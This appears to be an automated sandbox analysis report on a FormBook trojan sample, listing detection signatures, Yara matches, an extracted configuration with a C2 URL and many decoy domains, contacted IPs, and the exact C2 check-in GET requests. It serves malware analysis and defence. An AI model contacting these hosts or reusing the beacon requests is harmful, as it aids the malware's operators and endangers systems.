Windows Analysis Report
fooYgfbxno

Overview

General Information

Sample Name: fooYgfbxno (renamed file extension from none to exe)
Analysis ID: 626604
MD5: ce42fe431b88922ab59b6fd880cadcf6
SHA1: 652914d960da1d37d270db7f6e3b07c9d4b0e3a9
SHA256: 4d8cc87942499042195cec4fdb2fc5869d4bf98a1d827fd30fb74e82cf0fdc0f
Tags: 32exetrojan
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

AV Detection
barindex
Found malware configuration
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
Multi AV Scanner detection for submitted file
Source: fooYgfbxno.exe Virustotal: Detection: 31% Perma Link
Source: fooYgfbxno.exe ReversingLabs: Detection: 43%
Yara detected FormBook
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://www.chambaultfleurs.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT Avira URL Cloud: Label: malware
Source: http://www.lotsimprovements.com/ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ Avira URL Cloud: Label: malware
Source: http://www.xn--hj2bz6fwvan2be1g5tb.com/ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 Avira URL Cloud: Label: malware
Source: http://www.huvao.com/ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ Avira URL Cloud: Label: malware
Source: www.mentalnayaarifmetika.online/ocgr/ Avira URL Cloud: Label: malware
Source: http://www.mentalnayaarifmetika.online/ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: lotsimprovements.com Virustotal: Detection: 7% Perma Link
Machine Learning detection for sample
Source: fooYgfbxno.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 2.0.aspnet_compiler.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.aspnet_compiler.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.aspnet_compiler.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.aspnet_compiler.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: fooYgfbxno.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED
Source: fooYgfbxno.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: fooYgfbxno.exe
Source: Binary string: THEDEVILISHERE.pdb source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: fooYgfbxno.exe, 00000001.00000002.268862747.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, fooYgfbxno.exe, 00000001.00000002.268789828.0000000001300000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: fooYgfbxno.exe
Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.359318086.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.267648004.00000000011BA000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000003.268985043.0000000001354000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.359556094.000000000160F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000C.00000002.530185566.0000000003A1F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.358994253.0000000003500000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.529853249.0000000003900000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000003.360259300.0000000003700000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: aspnet_compiler.pdb source: svchost.exe, 0000000C.00000002.530634745.0000000003E37000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: aspnet_compiler.exe, 00000002.00000002.360692800.0000000003580000.00000040.10000000.00040000.00000000.sdmp

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 104.21.89.61 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 185.68.16.179 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 213.186.33.5 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.lotsimprovements.com
Source: C:\Windows\explorer.exe Network Connect: 209.15.40.102 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.chambaultfleurs.com
Source: C:\Windows\explorer.exe Domain query: www.zyaxious.website
Source: C:\Windows\explorer.exe Domain query: www.hofwimmer.com
Source: C:\Windows\explorer.exe Network Connect: 61.14.208.3 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.mentalnayaarifmetika.online
Source: C:\Windows\explorer.exe Domain query: www.doxofcolor.com
Source: C:\Windows\explorer.exe Network Connect: 206.189.50.60 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.myamazonloan.net
Source: C:\Windows\explorer.exe Domain query: www.huvao.com
Source: C:\Windows\explorer.exe Domain query: www.xn--hj2bz6fwvan2be1g5tb.com
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49768 -> 61.14.208.3:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.mentalnayaarifmetika.online/ocgr/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: UKRAINE-ASUA UKRAINE-ASUA
Source: Joe Sandbox View ASN Name: OVHFR OVHFR
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.huvao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.mentalnayaarifmetika.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT HTTP/1.1Host: www.chambaultfleurs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=yHjxPQMm3JcJX2wgLRnbME7+3RpzNlr7I3qSF8qv7PZk+uQof5Nzr3YLke9JRpMCS0ME HTTP/1.1Host: www.hofwimmer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.lotsimprovements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 HTTP/1.1Host: www.xn--hj2bz6fwvan2be1g5tb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.68.16.179 185.68.16.179
Source: Joe Sandbox View IP Address: 213.186.33.5 213.186.33.5
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sat, 14 May 2022 13:30:12 GMTContent-Type: text/htmlContent-Length: 1893Connection: closeETag: "627ea693-765"x-ray: p988:0.001/wn1005:0.000/Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 20 2d 20 d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 b7 d0 b0 d0 b1 d0 bb d0 be d0 ba d0 b8 d1 80 d0 be d0 b2 d0 b0 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 37 30 30 26 73 75 62 73 65 74 3d 6c 61 74 69 6e 2c 63 79 72 69 6c 6c 69 63 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 31 66 34 66 35 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 37 34 37 34 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4f 70 65 6e 20 53 61 6e 73 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 39 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 2d 32 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 72 72 6f 72 5f 62 72 69 65 66 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 20 70 6f 73 69 74
Source: svchost.exe, 0000000C.00000002.530690734.0000000003FB2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://adm.tools/support/
Source: unknown DNS traffic detected: queries for: www.doxofcolor.com
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=1BqqsZcQDAJnvcG+ktWW1SuLtWUnTVqW01xF9ocnHpFG4dYykDk5mjpX7chd6+Nfhcmp&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.huvao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=WCPK4waC2+ZoHrOc/rbcYrxYoSsYkto1AfFtfo68nJJBD8+b6aAxZ/giJh8W0WW05dhF&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.mentalnayaarifmetika.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=TZNys7210trfg8O8WBMuzy6C02I8maceBl4kNVlEZuNH+N4fd/TFP34Py3WDgrqbJJxT HTTP/1.1Host: www.chambaultfleurs.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=yHjxPQMm3JcJX2wgLRnbME7+3RpzNlr7I3qSF8qv7PZk+uQof5Nzr3YLke9JRpMCS0ME HTTP/1.1Host: www.hofwimmer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?P2Jl4=o9xz2vqcTVXu/W078IUcrzT+VrP3S9wZB9suAAi9fTl7LQCsWydvJWt3Uuk2q/fLQQGI&lfvx9=JFNTlvkP_ HTTP/1.1Host: www.lotsimprovements.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /ocgr/?lfvx9=JFNTlvkP_&P2Jl4=zPygAtD4LGfbsOxaPXlKDZlA/HZsirEX7sJv7vNHedMyDqAMsgZk6w8aA/BuIJhq09F8 HTTP/1.1Host: www.xn--hj2bz6fwvan2be1g5tb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Creates a DirectInput object (often for capturing keystrokes)
Source: fooYgfbxno.exe, 00000001.00000002.268464852.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.267329216.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273482433.00000000041A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.359226665.0000000001440000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.359013651.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.529429210.00000000034D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.311031707.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.295364991.0000000007126000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.359257959.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.267043761.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.528926429.0000000000C60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.529505063.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
